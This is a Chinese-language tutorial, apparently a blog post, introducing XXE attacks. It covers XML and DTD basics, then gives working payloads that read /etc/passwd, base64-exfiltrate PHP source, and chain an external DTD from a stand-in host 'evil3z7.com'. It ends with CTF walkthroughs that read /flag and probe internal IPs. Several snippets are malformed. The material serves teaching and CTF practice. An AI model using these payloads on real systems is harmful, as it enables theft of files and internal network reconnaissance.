一篇文章带你入门XXE

1.什么是XXE？

   XML External Entity（XXE）攻击是一种利用 XML 处理器的漏洞，通过引入恶意的外部实体来攻击应用程序的安全性。这种攻击通常发生在对用户提供的 XML 数据进行解析时，攻击者利用了 XML 规范允许引用外部实体的特性。

   在XXE攻击中，攻击者通常会构造带有恶意实体引用的 XML 数据，然后提交给应用程序进行解析。这些恶意实体引用可以指向本地文件系统中的文件、远程服务器上的资源，甚至是网络服务，从而导致应用程序执行不安全的操作，比如读取敏感文件、执行任意代码等。

  用一句话总结就是：

XXE攻击利用XML解析器的漏洞，通过在XML数据中注入恶意实体，使服务器解析时返回敏感信息或执行攻击者指定的操作。

2.如何利用XXE？

   当应用程序对 XML 数据执行解析时，如果未正确配置和处理外部实体引用，就可能存在 XML 实体注入（XXE）漏洞。这种漏洞可以被恶意攻击者利用来执行各种攻击，包括读取敏感文件、执行远程请求等。

    下面是一个简单的例子来说明 XXE 漏洞：

     假设有一个简单的 XML 文件 example.xml，内容如下：

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE example [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <content>&xxe;</content>
</root>

    在这个例子中，定义了一个叫做xxe的外部实体，它使用 SYSTEM 声明引用了一个本地文件 /etc/passwd。然后在 XML 内容中，我们引用了这个外部实体来填充 <content> 元素。

    假设应用程序在接收到这个 XML 文件时，未对外部实体进行适当的限制和过滤，那么在解析这个 XML 文件时就会触发 XXE 漏洞。攻击者可以通过构造包含恶意实体引用的 XML 数据，来读取或者执行系统中的敏感文件，比如 /etc/passw。

3.XML文档

● XML文档必须有根元素
● XML文档必须有关闭标签
● XML标签对大小写敏感
● XML元素必须被正确的嵌套
● XML属性必须加引号

也就是必须满足上面的格式xml文档的内容才会被识别和解析，那么必定会有一个评判的标准，那也就是DTD（document type definition）自动校准，可以是一个独立的文件，也可以在xml文件里面去声明。

DTD（内部的引用）:

< !DOCTYPE TranInfo[
<! ELEMENT TranInfo(CdtrInf, DbtrInf,Amt)>
<! ELEMENT CdtrInf(Id,Nm)>
<! ELEMENT DbtrInf(Id, Nm)>

]>

XML文件：

<? xml version="1.0" encoding="UTF-8"?>
<TranInfo>
<CdtrInf>
<Id>6226097558881666</Id>
</CdtrInf>
<Nm>小白</Nm>
<DbtrInf>
<Id>6222083803003983</Id>
<Nm>小黑</Nm>
</DbtrInf>
<Amt>1000</Amt>
</TranInfo>

有没有发现上面的DTD与下面的XML一一对应的。

外部的引用：

<? xml version="1.0" encoding="UTF-8"?>
<! DOCTYPE name[
!ELEMENT name ANY >
!ENTITY xxe SYSTEM "file:///D:/test/test.dtd" >

]>

<people>
<name>xiaohei</name>
<area>&xxe ;< /area>
</ people>

从这里就会涉及一个外部实体的引用。

外部实体引用协议

常见的使用方式：

1.file:///etc/passwd

2.php://filter/read=convert.base64-encode/resource=index.php

3.http:/www.baidu.com/evil.dtd

4.graphql://api.example.com/graphql

总之：一般完整的XML文件内容：

<!-- 第一部分:XML声明部分 -- >
<? xml version="1.0"?>

<!-- 第二部分:文档类型定义 DTD -- >
<! DOCTYPE note[
<!-- 外部实体声明 -- >
! ENTITY entity-name SYSTEM "URI/URL">
1>

<!-- 第三部分:文档元素 -- >
<note>
<to>Dave</to>
<from>GiGi</from>
<head>Reminder</head>
<body>fish together</body>
</note>

4.漏洞演示

我们已经知道了XML文档一般长什么样，其实最重要的就是外部实体的引用：file:///D:/test/test.dtd

这里面可能会是一个http请求,很可能会导致漏洞出现。

常见的危害就是任意文件读取，系统命令执行，内网端口探测等

其实还有一个漏洞XXE注入比较苟：

层层嵌套

那就是我在外部引用DTD没啥问题，但是这个DTD在里面又进行了一次外部实体引用

根据SinHub大佬的说法：

xxe.xml

<? xml version="1.0"?>
<! DOCTYPE a SYSTEM "http://evil3z7.com/evil.dtd">
<c>&b ;< /c>

evil.dtd

<! ENTITY b SYSTEM "file:///etc/passwd">

上面进行了双重引用\

实战演练：

<?php

error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    $ctfshow = $creds->ctfshow;
    echo $ctfshow;
}
highlight_file(__FILE__);    

这里就直接bp抓包给一手：

<?xml version="1.0"?>
<!DOCTYPE payload [
<!ELEMENT payload ANY>
<!ENTITY xxe SYSTEM "file:///flag">
]>
<creds>
<ctfshow>&xxe;</ctfshow>
</creds>
直接拿下。

这里还有一道特别精彩的题目：来自https://www.cnblogs.com/upfine/p/16570120.html

首先：出现一个界面

二话不说直接抓包给一手：

<?xml version="1.0" ?>
<!DOCTYPE llw [
<!ENTITY file SYSTEM  "file:///flag">
]>
<user>
	<username>&file;</username>
	<password>1</password>
</user>

发现没有用，那就换成其他命令：

包含：/etc/hosts、/proc/net/arp、proc/net/fib_trie等，最终在proc/net/fib_trie发现一个新的ip：10.244.80.202，结果如下：

<?xml version="1.0" ?>
<!DOCTYPE llw [
<!ENTITY file SYSTEM  "file:etc/hosts">
]>
<user>
    <username>&file;</username>
    <password>1</password>
</user>

这里获得一个新的地址，尝试下进行连接结果如下：

<?xml version="1.0" ?>
<!DOCTYPE llw [
<!ENTITY file SYSTEM  "http://10.244.80.202/">
]>
<user>
    <username>&file;</username>
    <password>1</password>
</user>

发现链接不上，接下来那就尝试同网段下面的不同地址。

爆破一手

直接拿下。

希望文章能够帮助到大家，谢谢！